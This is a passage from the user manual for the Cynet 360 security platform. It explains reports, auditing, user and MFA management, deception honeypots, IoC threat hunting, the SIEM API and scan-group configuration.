Manually-scanned hosts MUST be configured in a Scan Group in Settings. If the host is not part of a configured scan group either by hostname, IP address, IP Range, or Active Directory OU, the manual scan will fail. This is because Cynet 360 does not know which scan credentials or distribution type to use when scanning the host.

Managerial Tasks

Generating Reports

The Reports page enables Operators to generate reports on alerts and risks that are generated by the system.

The main parts of the Reports page are as follows:

SectionParameterDescription
AReport TypesUse this drop-down menu to select the report type. There are four types of Reports:

Alerts Report

Top Risks Report

Vulnerability Assessment Report

Inventory Report

BDate RangeSelect the Date Range for the report.
CReport FiltersYou can filter Reports to show All objects, or only Files, Hosts, Users, or Network objects.
DExport ReportYou can click the Adobe PDF icon to export the Report to PDF format.

Generating Alerts Reports

The Alerts Report contains statistics on all alerts generated by the system within the specified date range. You can filter these reports to show alerts just for Files, Hosts, Users, or Networks.

The Alerts By Type graphic on the Reports page displays alerts by type over the given date range. Each object type is highlighted in a different color.

The Alerts By Status graphic displays the number of alerts based on their current status (open or closed). This graphic indicates the incidence of high, medium, and low severity alerts.

The radar area of the Report displays specific areas associated with these alerts in the given date range. All File, User, Host, and Network traffic generating these alerts is displayed.

To Generate an Alert Report

To generate an Alert Report.

  1. From the scroll-down menu, select Alert Report.
  2. In the Data Range fields, enter the start and end date.
  3. Click Go.
  4. Click .

A PDF report is generated.

Generating Top Risks Report

The Top Risks Report displays reports for the Files, Hosts, Users, and Network traffic with the highest risk levels.

The 10 Most Risky Files graphic displays the riskiest objects based on the current Report filters you have selected.

The remaining part of this report displays the riskiest objects as well as some additional details.

To generate a Top Risk Report

  1. In the Data Range fields, enter the start and end date.
  2. From the scroll-down menu, select Top Risk Report.
  3. Click .
  4. A PDF report is generated.

Generating Vulnerabilities Assessment (VA) Reports

VA Reports produce operational data generated by the system based on the VA configuration. There are four options for these reports:

  • Missing KBs on Host (Microsoft OS patch)
  • Agent Validation (Security policy compliancy)
  • Application Patches Validation (3rd party application patch validation, for example, Java, Adobe)
  • Unauthorized Applications

Each of the reports generates and downloads as a CSV file. You can send these reports to your IT team to resolve these issues.

To Generate a Vulnerability Assessment Report

  1. In the Data Range fields, enter the start and end date.
  2. From the scroll-down menu, select Vulnerability Assessment Report.
  3. From the list of Report Types display, select one.
    1. There are four types of reports:
      1. Missing KBs on Host
      2. Agent Validation
      3. Application Patch Validation
  4. Unauthorized Applications

A CSV file is generated.

Generating Inventory Reports

Inventory Reports produce operational data generated by the system based on the Cynet collection. This is part of the immediate visibility that Cynet provides. Typical Use Cases are:

  • Creating and maintaining Configuration Management Database (CMDB)
  • Understanding what is protected
  • Finding old or non-supported OS

To generate an Inventory Report

  • In the Data Range fields, enter the start and end date.
  • From the scroll-down menu, select Inventory Report.
  • Click Inventory Per Post

A CSV file is generated.

Note: Disable your web browser’s pop-up blocker for the Cynet web interface. PDF reports are presented in a separate browser tab and might be blocked by the pop-up blocker.

Auditing Actions

The Audit Page provides a full audit trail for all User actions performed in the system. You can save the audit records in the database and in external files.

This section describes how to access and use the Audit trail using the following methods:

  • Cynet UI
  • External Log files

Auditing Using the Cynet UI

To navigate to the Audit page, click the Audit icon.

The Audit page displays all User actions being performed in the system.

The table displays the following information:

ParameterDescription
User NameThe name of the User who executed the action that generated the audit.
Requester IPThe IP address of the host that generated the request.
Event DescriptionDisplays details about the action. Includes a short title of the action. Might include a JSON payload with additional details.
Event TypeThe type of the Event.
CategoryThe category of the action in the system. The options are:

  • Settings
  • Remediation
  • Account
  • Alerts
Event TimeYou can set the time frame for the events that you want to audit. You can enter the From date and the To date.

You can select the number of entities to display per page. The default is 25.

To export the data to a spreadsheet, click .

Auditing using External Log Files

By default, all audit records are located at the following path: “C:\Cynet360\logs\audit”.

The audit Files are cyclical. For every system restart, or for every 50 MB, a new file is created in the following format: “CF_<CREATE_HOUR>T<CREATE_MINUTE>T<CREATE_SECOND>_<YYYYMMDD>.txt”

The file is text-based and includes all audit records. Each record appears in a new line: “date hour Audit action:<action code>;UserName:<User>; category:<category>; details:<description+Json>”

This is shown in the following example:

Managing Users

Manage Users from the Users page in the Settings menu. This page contains settings for User authentication to the Cynet console. You can add Users, delete Users, and you can edit User permissions. You can also change User passwords.

Integrating with Active Directory

The Active Directory Authentication section contains settings that determine the domains that the Cynet console uses for Active Directory authentication. In this section, you can manage the credentials that Cynet uses within each domain to validate Active Directory User authentication to the console.

To create a new set of credentials, in the Integrations tab, click Create.

The following dialog box opens:

ParameterDescription
NameAn alias for this set of credentials.
UsernameThe User name of the account that is used to validate the credentials.
PasswordThe password of the account that is used to validate the credentials.
DomainThe domain in which the account exists.

Note

The account used to validate the credentials does NOT need to be a domain administrator. It only needs to be a domain User.

To check if the Username and password are correct, click Validate Credentials.

To save these credentials, click Save.

The new credentials appear in the Manage Credentials section. To change existing credentials click Edit. To remove credentials click Delete.

When there is at least one set of credentials saved, you can enable Active Directory authentication on the Users settings tab.

Importing User Settings Data from Active Directory (AD)

You can configure Cynet to import User account attributes from Active Directory. To import User attributes from AD:

From the Settings page, select the Configuration tab.

Navigate to the Import Data Settings section.

Select the first field from the scroll-down menu under User Name.

(Optional) Click +.

Select the second field

Repeat until all the required fields are listed

Name all the selected fields with the corresponding attributes.

Click Save.

In the example below, each field is mapped to the corresponding attribute name in Active Directory. For example, the Role field is mapped to the ‘title’ attribute.

Note

Active Directory attribute names are case sensitive.

  1. The User data you can import from AD includes:
ParameterDescription
User NameThe User’s account name.
MobileThe User’s mobile phone number.
Office PhoneThe User’s office phone number.
RoleThe User’s job title.
DepartmentThe department in which the User works.

Notes

The server imports User data from Active Directory once every 24 hours.

You can view imported User data on the User Details Page.

Importing User Settings from a CSV File

You can configure Cynet to import User account attributes from a Comma Separated Values (CSV) file. The User data that you can import from a CSV file includes:

ParameterDescription
User NameThe User’s account name.
MobileThe User’s mobile phone number.
Office PhoneThe User’s office phone number.
RoleThe User’s job title.
DepartmentThe department in which the User works.

To import User attributes from a CSV file,

From the Settings page, select the Configuration tab.

Navigate to the Import User Data From CSV File section.

Select the first field from the scroll-down menu under User Name.

(Optional) Click +.

Select the second field

Repeat until all the required fields are listed

Give a number to each selected field.

That number corresponds to the index of data in the CSV file.

Click Save.

Click Choose File

Navigate to the location of the CSV file on your computer.

Select the CSV file to upload.

Click Upload CSV File.

  1. The file is parsed according to the field mapping configured in the section above. You can view imported User data on the User Details Page.

In the example below, each field is mapped to the corresponding index of data within the CSV file. For example, the Role field is mapped to index #3 in the CSV file.

The CSV file to match this mapping includes User data like the one below, where the User name field is first, mobile number second, office number third, and so on.

Creating New Users

To create a new local User:

From the Settings page, select the Users tab.

Enter the User Name.

Enter the Password.

Select the User Level.

Click Add.

The User Level options are:

ParameterDescription
Custom UserEnables Custom User permissions. You can use the “Custom User Access Permissions” drop-down menu to select which actions this User is enabled to perform.
OperatorEnables Users to view all data, perform remediation actions, make configuration changes, and add, remove, and edit Users.
DashboardEnables Users to access the Main Dashboard. Users cannot view data, perform remediation actions, or make any configuration changes.

Custom User Access Permissions

When creating a new User, if Custom User is selected as the User Level, you must assign permissions to the new User.

To assign permissions to the new User:

In the Manage Local Users area, click Edit Permissions.

A screenshot of a cell phone Description automatically generated

Click the drop-down arrow.

Click Save.

Activate Chief Information Security Officer (CISO) Kit

The CISO Kit integrates Cynet 360 with a mobile application to enable CISOs to receive warnings from the Cynet 360 system.

The CISO Kit is compatible with iPhone, iPad, and Apple Watch devices. It is a dashboard application that is available for Cynet 360 v3.6.2 and above, for SaaS installations only.

For more information about how to operate the CISO Kit from portable devices, refer to Cynet CISO Kit User Guide.

Adding Users to Groups

Select the Domain from the drop-down menu.

You can configure Domains in the Active Directory section of the Integrations page.

Enter a User name from the selected domain.

Select the User Level.

Authenticated Users in this group are assigned to this User level.

To add the User to this group, click Add.

All Users in this group can authenticate to the console using the Active Directory credentials.

The new Users appear in the Enabled Identities section.

Enabled Identities

When a group or User has been mapped, it appears in the Enabled Identities section.

To remove an enabled identity, click Remove.

Active Directory Authentication Settings

The Active Directory Authentication section maps Users or Groups within Active Directory domains to User levels in the Cynet console for authentication.

Before these settings can be configured, you must configure two other settings:

Integrations

Configure a domain in the Active Directory section of the Integrations settings tab.

Authentication Mode

Enable an authentication mode in the Manage Authentication Users section of the Users tab.

When you have configured the Domain and an Authentication mode, the AD Authentication section becomes available.

Setting the User Authentication Method

You can use this setting to configure which authentication method is enabled for Users when logging into the Cynet console.

To Configure the User Authentication Method:

From the Settings page, select the Users tab.

Select the level of authentication.

Enable Local Authentication Only—Only local Users in the Cynet User database are authenticated.

Enable Active Directory Authentication Only—Only Active Directory Users are authenticated.

Enable Local & Active Directory Authentication—Users from both the Cynet User database and Active Directory are authenticated.

Notes

If an authentication method that uses Active Directory is enabled, the AD Authentication section of settings becomes available. These settings map Users and groups in Active Directory to User levels in the Cynet console for authentication.

You must also configure the Active Directory domain in the Integrations settings. This page points the Cynet console to the domain to validate Active Directory credentials.

Cynet recommends enabling Active Directory & Cynet Users authentication method so that the Operator account (or any other local account) can be used to log into the console in the event that Active Directory authentication is not possible.

Managing Cynet Users

You can add, edit, or delete Local Users. You can also change User passwords.

The Operator account is the default login for the Cynet console, and it cannot be deleted. Cynet recommends changing the password of the Operator account from the default password to something more complex and secure.

Configuring User SMS Confirmation Settings

This setting enables the SMS Confirmation functionality. When Cynet observes unusual User logins, it sends an SMS to the User’s mapped mobile number.

To enable SMS Confirmation, in the Configuration tab:

Select Enable SMS Confirmations.

Click Save.

Authenticating an Active Directory Group

To add an Active Directory group for Cynet console authentication, in the Users tab:

Select a Domain from the drop-down menu.

The domains are configured in the Active Directory section of the Integrations page.

Select the Active Directory Group to map.

All groups from AD are listed in this drop-down menu.

Select the User Level. Authenticated Users in this group are given this User level.

To add this group, click Add.

All Users in this group are able to authenticate to the console using the Active Directory credentials.

Added Groups appear in Enabled Identities.

Managing Multi-Factor Authentication (MFA)

IMPORTANT!

MFA is available for local Users only.

Activating MFA for a User

To activate and configure the MFA feature for individual Users:

From the Users tab, navigate to Authentication Settings.

Select Enable Local Authentication Only.

Navigate to Manage Local Users.

Next to the relevant User, click Manage MFA.

A screenshot of a cell phone Description automatically generated

From the Manage MFA Device window, enter the User’s phone number. The required format is a + followed by the country code, followed by the number. For example, +000123456789.

A screenshot of a cell phone Description automatically generated

Click Assign MFA.

The first time the User attempts to login after the MFA is assigned, the phone validation screen opens. Cynet 360 sends a code to the User’s phone by SMS. The User enters that PIN code here.

A screenshot of a cell phone Description automatically generated

Note

The PIN code sent by SMS is only valid for three minutes. If required, the User can click Resend SMS to request a new valid code.

The User is redirected to a QR code validation screen. The User either scans the QR code with a Google or Microsoft authenticator app or enters the manual key string.

A screenshot of a computer Description automatically generated

Subsequent logins will be verified with the code provided by the Google or Microsoft authenticator app.

To resync the MFA or update the phone number, follow the same steps.

Removing MFA for a User

A screenshot of a cell phone Description automatically generated

Password Complexity

Passwords must include at least 3 of the following 4 groups:

Lower case letters (a-z)

Upper case letters (A-Z)

Numbers (0-9)

Symbols ([email protected]#$%^&*)

Passwords must be between eight and twenty characters in length.

Changing a User’s Password

All Users can change their own passwords.

To change an account’s password, in the Manage Users tab:

Click Change Password.

Note

Passwords for Dashboard level Users can be changed by Operators. Operator-level account passwords cannot be changed by other Operators.

Enter your current password

Enter your new password.

Enter your new password to confirm.

Click Change.

If the new password does not meet the complexity requirements, you are prompted to re-enter a new password.

When Operators change another account’s password, the system prompts them to enter the new password twice. If the new password does not meet the complexity requirements, they must enter a new password.

Deleting a User

To delete a User from the Cynet console, click Delete User.

Note

The default Operator account cannot be deleted.

Deception

Cynet 360 deploys deception entities (honeypots) in your network to lure attackers. When these entities are used, Cynet 360 detects them and raises an alert on the illicit activity.

Each Deception alert contains details about which type of deception was triggered, the attacker IP address, the Victim IP address, hostname, and File name, if applicable.

The types of deceptions are:

Deception Users

Decoy Users and host names

Deception Files

Decoy files

Deception Network

Decoy hosts and endpoints on the network

To enable these deceptions:

Activate the deception types.

Configure the deception types.

Deception Users

Activating Deception Users

To activate deception Users and files:

On the main menu, click .

In the Scan Groups tab, navigate to Deception Users.

Click Enable Deception Users.

Configuring Deception Users

To configure deception Users:

On the main menu, click .

Click Deceptions.

Click the Users tab.

To create a new deception User:

Click Create.

Select the Scan Group.

Enter a User Name.

Enter a Host Name.

Enter a User Type.

Click Add.

To edit an existing Deception User, click Edit and change the required settings.

To remove an existing Deception User, click Remove.

Deception Files

Cynet 360 supports different types of decoy files.

Decoy TypeDescription
Office DocumentsCynet deploys Excel, Word, and PowerPoint documents to the host in a newly-created User directory. These files contain beacons. When they are opened, they communicate with the Cynet server and generate an alert. Cynet enables Users to create their own decoys.
Remote Desktop FilesCynet deploys Remote Desktop (RDP) files with saved imitation credentials on the host. When this file is executed, it attempts to connect to the Cynet server with invalid credentials and generates an alert.
ODBCCynet configures an ODBC connection on the host, which points to the Cynet server. When this connection is used, it generates an error and an alert.
NetBIOSCynet can configure network shares on the host, which are monitored. When the session is used, it generates any alert.
Stored CredentialsCynet implants invalid credential information in the Windows Credential Manager. If these credentials are obtained by an attacker and used for authentication elsewhere in the environment, an alert is generated.
Text FilesCynet deploys text files to the host with invalid credentials. These credentials disguise themselves as domain credentials or credentials to an internal Web application. If either of these invalid credentials is used, an alert is generated.

Deception Office Documents

Cynet creates a new User folder such as C:\Users\admin_c493d82, with a randomly-generated account name.

Within this directory, there will be several deception Office documents such as Word (.docx), Excel (.xlsx), and PowerPoint (.pptx) files. These files contain attractive filenames to lure attackers and are placed through the new User directory.

When one of these files is opened with Microsoft Office, the beacon within the document attempts to communicate with the Cynet server as well as the Cynet-controlled Web domain ad-stats.com. This ensures that the Cynet SOC can identify when deception files are opened outside the corporate LAN environment.

Deception RDP Files

Cynet creates a saved RDP connection file in the same directory as described above. The RDP connection file contains invalid credentials. The file attempts an RDP connection to the Cynet server on port TCP 8484 and fails. When the RDP attempt is made, an alert is generated in the Cynet console.

Deception ODBC Connection

ODBC (Open Database Connectivity) is an open standard API for accessing databases. ODBC statements are used to connect to various databases such as Access, dBase, DB2, and Excel. Cynet uses the Windows built-in programming support for ODBC by planting an ODBC connection to a non-existent database in the environment. When an attacker attempts to use this ODBC connection to connect to the invalid database, an alert is generated in the Cynet console.

Cynet implants the ODBC connection by deploying various registry keys to the Windows host. The implanted ODBC can also be found in Control Panel > System & Security > Administrative Tools > Data Sources (ODBC).

To list the implanted connection as an SQL Server, click the System DSN tab.

Deception Text Files

Cynet can deploy text files with invalid domain credentials within a newly created User directory. Cynet can also deploy text files with credentials for a non-existent internal application. If the domain credentials are used for authentication or if the URL is accessed, an alert is generated in the Cynet console.

Deception Stored Credentials

The Windows Credential Manager is the “digital locker” where Windows stores login credentials on the network. This data can be accessed by Windows or other applications that use the stored credentials. There are three main types of stored credentials in the Credential Manager:

Windows Credentials

Only used by Windows and its services. For example, saved credentials for a network shared folder.

Certificate-based Credentials

Used together with smart card authentication. This is usually configured in higher security networks with Active Directory configured for smart card authentication.

Generic Credentials

General saved credentials that are defined by applications used on the computer, for example, Office365 or Windows Live.

Credentials saved in the Credential Manager are commonly targeted by threat actors. Cynet 360 implants invalid Username and password credentials in the Credentials Manager. When a threat actor uses these credentials to authenticate in the environment, an alert is generated.

Activating Deception Files

To activate deception Users and files:

On the main menu, click .

In the Scan Groups tab, navigate to Deception Files.

Click Enable Deception Files.

Configuring Deception Files

To configure deception Files:

On the main menu, click .

Click Deceptions.

Click the Files tab.

From here you can:

Add a new decoy file

Edit existing decoy files

Enable decoy files in groups

Decoy Files Listener Port

This is the listener port that decoy files use when beaconing back to the Cynet server. The protocol used is TCP.

Enabling Decoy Files in a Group

To enable a Decoy File in a Group:

Click the file name or .

Click .

Select an option to deploy.

Adding a New Decoy File

Users can create a new Decoy File from an existing Office file.

To Add a New Decoy File:

From Settings>Deception tab, click Add New Decoy File.

Select a file to use as the Decoy.

Click Generate Test File.

A test Decoy File is downloaded to the destination of your choice.

Enter a file name.

Select a group.

Select file deployment locations.

When this file is accessed, Cynet generates an alert.

Deception Network

Cynet 360 deploys deception entities (honeypots) in your network to lure attackers. When these entities are used, Cynet 360 detects them and generates an alert on the illicit activity.

To enable this feature:

Activate the Deception Network.

Configure the Deception Network.

Activating the Deception Network

To activate the Deception Network:

On the main menu, click .

Click the Scan Groups tab and navigate to Deception Network.

Click Enable, then Save.

Configuring the Deception Network

To configure the Deception Network:

On the main menu, click .

Click the Deception tab.

Click the Network tab.

In the Max Decoy Hosts Per Endpoint field, enter the maximum number of hosts for each endpoint. The default is 10.

In the Select Group field, enter the scan group to configure.

Add a single or multiple decoy.

To manually add a single decoy, click Add

To import multiple decoys from a CSV file, click Import

To see how the CSV file must be set up, click Download CSV Example

A screenshot of a cell phone Description automatically generated

Note

You can add and import as many decoys as you want, but only the maximum number is distributed on your network. The decoys to be uploaded are selected by Cynet 360 at random.

To delete a decoy, select it from the list and click Delete Selected Decoys.

To delete all decoys, click Delete All Decoys.

IMPORTANT!

Any change to the list of decoys (adding, importing, or deleting) causes Cynet 360 to automatically select new decoys.

A screenshot of a cell phone Description automatically generated

When a file is accessed, Cynet triggers an alert.

Scanning On-Demand (Threat Hunting)

Cynet enables Operators to scan endpoints for threats. Operators can scan for threats on-demand, based on their awareness of Indicators of Compromise (IoCs).

To scan on demand:

Define the IoCs (file SHA256, file MD5, file name, full file path), and the extensions and folders to search.

Define the severity of the potential alert if a threat is found.

Cynet scans the endpoints. If a file that matches the IoC is found, an alert is generated.

Enabling Threat Hunting

To enable Threat Hunting:

On the Cynet Dashboard, navigate to Settings.

Click Scan Groups.

In the Threat Hunting section, select Enable Threat Hunting.

Enter a period of time (in minutes) for Cynet to check if there is a new search to perform.

To disable threat hunting, deselect Enable Threat Hunting.

Configuring Threat Hunting Settings

Operators can configure Threat Hunting settings based on their awareness of IoCs.

To configure Threat Hunting settings navigate to Settings > Threat Hunting.

Creating a List of IoCs to Search

From the Indication Type drop-down menu, select the Indication Type you want to search.

For each Alert Type, enter a Value and a Description of the Alert.

To add the new search indicator to the list, click .

The new search indicator appears in the list.

Note

Cynet generates an alert for any of the IoCs it finds. It is not necessary to find all of the IoCs simultaneously to generate an alert. In the Filter By Extension section, insert a file extension to scan.

Click .

The file extension is added to the list.

To add more file extensions, repeat Steps 4 and 5 above.

In the Filter By Directory section, insert a Directory to scan.

Click .

The Directory is added to the list.

To add more Directories, repeat Steps 6 and 7 above.

From the Alert Severity drop-down menu, select the severity of the alert.

You can select a Severity level from Informative, Low, Medium, High, and Critical.

To stop a running scan and start a new scan, in the Suppressed Mode section, select Suppress. To wait for the current scan to stop, leave this checkbox cleared.

To save the changes you made, click Save Changes.

Threat Hunting starts on all endpoints.

To stop a current scan, click Stop Current.

To restart the current scan, click Restart Current.

All endpoints are scanned. If they were scanned previously, they will be rescanned.

To delete all the IoCs, click Clear Search Criteria.

Treat Hunting Results

When Cynet finds a threat based on the defined IoCs, it generates an alert and sends an email.

The alert appears in the Alerts page.

To see details of the Alert, click .

Using the Cynet SIEM API

The Cynet Security Information and Event Management (SIEM) API is a new API that enables SIEM systems to extract information from Cynet.

Sockets

Domain occurrences

File occurrences

User login

Vulnerability Assessment (NEW!)

Cynet APIs are documented in the product at https://localhost:6443/help.

Relevant API entries:

Sockets

api/network/sockets?FromDate={FromDate}&ToDate={ToDate}&Offset={Offset}&Limit={Limit}

Domains

api/network/domains?FromDate={FromDate}&ToDate={ToDate}&Offset={Offset}&Limit={Limit}

File Occurrences

api/file/occurences?FromDate={FromDate}&ToDate={ToDate}&Offset={Offset}&Limit={Limit}

User

api/User/loggedIn?FromDate={FromDate}&ToDate={ToDate}&Offset={Offset}&Limit={Limit}

Vulnerability Assessment

Missing Windows patches – api/va/patches/missing

Existing Windows patches – api/va/patches/existing

Unauthorized Applications – api/va/riskyApps

Installed software – api/va/installedSoftwares

Applications patch – api/va/patchValidation

Installed agents – api/va/Agents

Notes:

Currently, there is no documentation to the fields of the internal objects (LoggedInUserSummaryDTO, SocketSummaryDTO, and FileOccurrenceModel)

The filter according to FromDate and ToDate is calculated as follows:

FromDate =< last-seen < ToDate

Defaults

Offset – 0

Limit – 500

FromDate – no filter

ToDate – no filter

Setting Up Cynet

You can configure Cynet 360 to meet your organizational needs according to the requirements of your operating environment.

Settings

The Settings Page provides extensive system management and configuration capabilities for the Cynet 360 platform. The page has the following tabs:

Scan Groups

You can define a population of hosts to scan by configuring settings in the following main Scan Group sections:

Scan Settings

Scan Population

Scan Schedule Settings

Configuration

You can configure system settings including:

Analytics Server Configurations

Exclusion Settings

Network Traffic Analysis Settings

Log Parser Settings

VPN Log Parser Settings

Import User Data Settings

Import User Data from CSV File

User SMS Confirmation Settings

EPS Configuration

You can define custom memory analysis methods for the EPS.

Note

Cynet recommends that you contact your Cynet Technical Support representative before creating a memory analysis method.

Deception

You can create new or edit existing deception files and configure or update Network settings for the deception files.

Advanced

You can configure settings for advanced scanning, including:

Connection Settings

Privacy & Compliance Settings

Master & Slave Server Settings

Policy Exclusion Settings

Throttle Settings

Domain Whitelisting Settings

Remediation Settings

Decoy Settings

Console Settings

File Monitoring

Windows Event Settings

Note

The terms Decoy and Deception are interchangeable.

Users

You can configure settings for User accounts accessing the Cynet system. These include:

Authentication Settings

Add/Edit/Delete Users

Change Passwords

Active Directory Authentication Settings

Maps

You can configure IP ranges for your Cynet environments on a map.

Analysis

You can configure settings for analysis actions of the system.

Dynamic Analysis Settings

Deep Scan Settings

Alerts

You can configure settings for alerts generated. These include:

Email Settings.

General Settings

Alert Settings

Unscanned Host Alert Settings

Email Alert Filter Settings

Integrations

You can specify Active Directory domains for User authentication.

Vulnerability Management

You can configure settings for the following cases:

Windows Patch Validation

Unauthorized Applications

Application Patch Validation

Agents Validation

User Behavior Analytics (UBA) Management

You can edit event triggers used to monitor User behavior.

Threat Hunting

You can configure settings for searches involving specific file information.

Whitelisting

You can configure settings to create whitelisted profiles and automatically exclude certain alert types.

Remediation

You can configure settings for Custom Remediation actions and Playbooks.

Cynet recommends that you contact your Cynet Support Technician before setting up custom remediation actions.

Windows Events

You can edit existing Windows Events configure settings, or create new configurations defining which Windows events to monitor for the selected scan group.

System Info

You can view information regarding the Cynet system in two sections:

Main Info

System Health

Setting Up Cynet to Detect Threats

The first part of Cynet’s breach protection strategy is detecting threats. Cynet initiates threat detection using the following methods:

Setting Up Scan Groups

Operators can use the Scan Groups page to configure endpoint scanning. You can configure groups based on the endpoint type, IP subnet, or scanner mode. You can use a “default group” or you can create a new scan group.

To create a new Scan Group:

Click Create.

Enter Group Name and Group Description (these are optional).

Click Save to create the new group.

To edit the Group Information section, select the appropriate Scan Group from the drop-down menu.

To Remove a Scan Group:

Select the correct group for deletion from the drop-down menu.

Click Remove.

Scan Group Settings

You can use scan groups to separate scan settings between subnets, computer types, and departments. All scan settings are saved to the group and are specific to that group. Scan groups can contain separate credentials for scanning, scan scheduling, and distribution types.

Setting Up the Distribution Type

The Distribution Type setting enables the system to push the Cynet endpoint scanner (CynetEPS) to the endpoints.

Distribution Types include:

Auto

The Auto Distribution Type cycles through all the Distribution Types. If one Distribution Type fails, the system proceeds to the next type and attempts to scan the host. Cynet uses this setting in the following order:

Launcher

Scheduled Tasks

Remote Procedure Calls (RPC)

SSH

Launcher

The Cynet Launcher Distribution Type authenticates to the endpoints using the configured account credentials via CynetLauncher.exe. It transmits the CynetEPS via SMB to be executed.

To enable this Distribution Type, ensure that port 445 is open at the endpoint.

Scheduled Tasks

The Cynet server authenticates to the endpoints using the configured account credentials via MSRPC and transmits a task message to the endpoints to execute the CynetEPS.

To enable this Distribution Type, ensure that TCP port 135 is open at the endpoint.

SSH

The Cynet server authenticates to the endpoints using the configured account credentials via SSH. It transmits the CynetEPS and runs the daemon.

To enable this Distribution Type, ensure that TCP port 22 is open at the endpoint.

RPC

The Cynet server authenticates to the endpoints using the configured account credentials via PsExec and transmits the CynetEPS via SMB to be executed.

To enable this Distribution Type, ensure that TCP port 445 is open at the endpoint.

Manually Installed Agent

In this case the Cynet server does not distribute the EPS to the hosts. The installation is performed using a third-party system such as WSUS, SSCM, or Big Fix.

To see Distribution Type settings, on the Scanner page, click Manual Scans.

Scan Group Information Settings

The Scan Account is the account used to authenticate to hosts when scanned. You can save multiple sets of credentials to be used on any scan group. Cynet hashes and encrypts all saved credentials in the Cynet database.

Note

Separate credentials are necessary for Windows, Linux, and MAC hosts. Hosts of each OS type must be placed in a separate scan group, with separate credentials for each scan group.

Selecting the Scanning Platform

You can select the relevant operating system from the drop-down menu.

All settings are adjusted based on this selection.

Note

You can only include one Operating System in a group.

To create a new scan account:

Select a Distribution Type (other than Manually Installed Agent) from the drop-down menu.

Click Create.

Enter an alias for this set of credentials.

The Service option uses the current credentials running on the server.

To use the Credentials option, enter a Username, password, and the domain (if an Active Directory account).

Note

If the credentials entered are a local Windows account or a local Linux account, you do not need to specify a domain.

To confirm that the credentials you entered are valid, click Validate Credentials. If the credentials validate successfully, a displays. If the validation fails, a displays.

Note

“Validate Credentials” only works for Active Directory credentials. Local Windows accounts or local Linux accounts do not validate.

To save the credentials, click Save.

Creating Manually Installed Agents Groups

To create a group that contains a manually-installed agent:

Create a new Scan Group. See “Setting Up Scan Groups”.

In the Distribution Type section, select Manually Installed Agent.

Click Save.

This group now contains only agents that are manually installed.

Adding an Agent to a Manually-Installed Group

For specific details on how to work with Manually-Installed Agents, go to:

https://cynethelp.zendesk.com/hc/en-us/articles/360010559033-Cynet-360-Light-Agent-Manual-Installed-Agents-Windows-Linux-MAC

To pre-configure a host in the scan group population, go to:

https://cynethelp.zendesk.com/hc/en-us/articles/360015098014-Cynet-360-Configuration-Recommendations-First-Installation

To add a Manually-Installed Agent to a group:

Add the agent to the group population.

Use one of the suggested methods:

Host name

IP range

OU

Install the Agent using MSI.

The Agent is automatically associated to the group in which it was defined.

This feature supports Linux OS, providing the Distribution Platform parameter is set to Linux.

Changing a Group

You can delete a Host from one scan group and add it to another scan group.

You can also Export and Import the Host population.

Adding Agents to Groups Using CLI

To add a Manually-Installed Agent to a group as defined above, the argument
“-group” is added to the EPS.

For more details on how to do this, go to:

https://cynethelp.zendesk.com/hc/en-us/articles/360010559033-Cynet-360-Light-Agent-Manual-Installed-Agents-Windows-Linux-MAC

and

https://cynethelp.zendesk.com/hc/en-us/articles/360006766914-Use-logon-script-to-install-Cynet-MSI

The new argument points to the name of the group to which the EPS belongs.

To use this parameter:

Add “-group” to the MSI command line arguments.

Insert the target group name.

When using the MSI installation method, the Cynet MSI might have additional command line parameters for the group name. If the group name exists, it assigns the host to the relevant group. Otherwise it assigns the host to the default MSI group.

Changing Group

To move an agent from one group to another group, uninstall the MSI.

Reinstall the MSI with the new group name as the argument.

Setting the Scan Mode

This setting enables the system to configure the Cynet endpoint scanner (CynetEPS) to run on hosts.

The methods include:

Interval

The CynetEPS deploys to the configured endpoints at the specified scan interval. The CynetEPS self-terminates on the endpoints at the end of the scan cycle.

Always On

The CynetEPS deploys to the configured endpoints immediately. The CynetEPS continues to run after the initial scan completes. This ensures that any new change or activity on the endpoints is collected and sent back to the Cynet server for analysis in real-time.

Light Agent

The CynetEPS deploys to the configured endpoints immediately. The CynetEPS continues to run after the initial scan completes and a service is created so that the CynetEPS starts when the endpoints reboot.

Scan Mode settings are marked on the Scanner pages in the Status column. Hosts scanned in the Interval mode show the scan progress. Hosts scanned in the Always On and Light Agent modes display their current status.

Available scan modes are dependent on the selected Distribution Type.

Setting Up the Active Directory Domain

You can specify the Active Directory domain to scan.

In the Active Directory section, enter the domain name and click Save.

Setting the CPU Average Consumption

This setting enables you to configure the maximum CPU usage CynetEPS uses when running on endpoints in this scan group.

In the CPU Average Consumption section, select an option from the drop-down menu.

Notes

15% is the recommended option.

If you select 5% not all alert information is collected. That information is not retrievable.

Scan Interval

Scan Interval shows the time interval during which endpoints in this scan group are scanned. This time interval is set to 60 minutes.

Additional Settings

The following settings are rarely used. Some of them can only be configured by a Cynet Technical Support Specialist.

Some of the following settings are dependent on the distribution type or scan mode being used:

Network Attack Detection

Use this setting in Light Agent and Always On modes. It configures the CynetEPS to detect network-based attacks being performed on the host. The CynetEPS binds itself to the endpoint NIC to see all network traffic being performed on the host.

Internet Availability Check

You can configure the CynetEPS to check the endpoints for Internet connectivity. This setting weighs some threat indicators differently depending on their ability to connect directly to the Internet.

Memory Injection Remediation

You can configure the CynetEPS to automatically kill any process that performs a memory injection or an illegal usage of memory on a scanned host. It is most useful for immediate Ransomware mitigation.

Unscanned Group Alert

This setting generates an alert if most of the scan population of this group is not being scanned.

Advanced Detection Technology (ADT)

This setting turns on the Advanced Detection Technology (ADT) heuristic engine. The ADT engine enables the Cynet EPS to detect threats using behavioral analysis.

ADT—Behavioral Heuristic Remediation

This setting enables the behavioral heuristic remediation capabilities of the ADT.

ADT—Ransomware Heuristic Detection

This setting enables ransomware detection capabilities of the ADT engine in the Cynet EPS. It appears only in Always On and Light Agent modes. It is only available if you enable ADT.

ADT—Ransomware Heuristic Remediation

This setting enables the ransomware remediation capabilities of the ADT engine. It appears only when Ransomware Heuristic Detection is enabled. When Ransomware is detected using the ADT engine, it is automatically stopped.

ADT—Ransomware Heuristic Decoy Files

This setting enables ransomware detection through the use of hidden decoy files created on scanned endpoints. It appears only when Ransomware Heuristic Detection is enabled. These decoy files are different from the files described in “Deception Files”. These specific files are designed to detect modifications by ransomware.

ADT—Ransomware Heuristic Decoy Disk Space Limit

This setting limits the amount of disk space the Ransomware Heuristic Decoys can consume on an endpoint (in MB). It appears only when Ransomware Heuristic Decoys is enabled.

File Monitoring

You can monitor the following file events:

Create new

Access

Delete

Delete for rename

Renamed file

ADT—Fuzzy Hashing Detection

